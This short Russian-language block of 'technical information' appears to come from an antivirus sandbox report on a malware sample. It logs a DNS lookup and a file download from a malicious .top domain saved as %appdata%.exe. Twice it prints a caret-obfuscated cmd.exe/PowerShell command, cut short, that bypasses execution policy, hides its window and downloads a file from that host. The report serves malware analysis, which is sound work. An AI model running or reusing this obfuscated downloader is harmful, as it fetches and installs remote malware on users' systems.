Техническая информация
- http://panntyplenty.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^owE^RsheLl.EX^E^ -exe^c^u^tI^oNPOL^IcY ^ByPa^Ss -^N^OProf^I^LE -wI^NDO^wsTYLE hI^d^De^N (^Ne^W^-^obJ^E^c^t s^ySteM^.n^ET.^weBclIent).DoW^NLOAdF^Ile('http://panntyplent...
- DNS ASK pa####plenty.top
- '<SYSTEM32>\cmd.exe' /c "P^owE^RsheLl.EX^E^ -exe^c^u^tI^oNPOL^IcY ^ByPa^Ss -^N^OProf^I^LE -wI^NDO^wsTYLE hI^d^De^N (^Ne^W^-^obJ^E^c^t s^ySteM^.n^ET.^weBclIent).DoW^NLOAdF^Ile('http://panntyplent...' (со скрытым окном)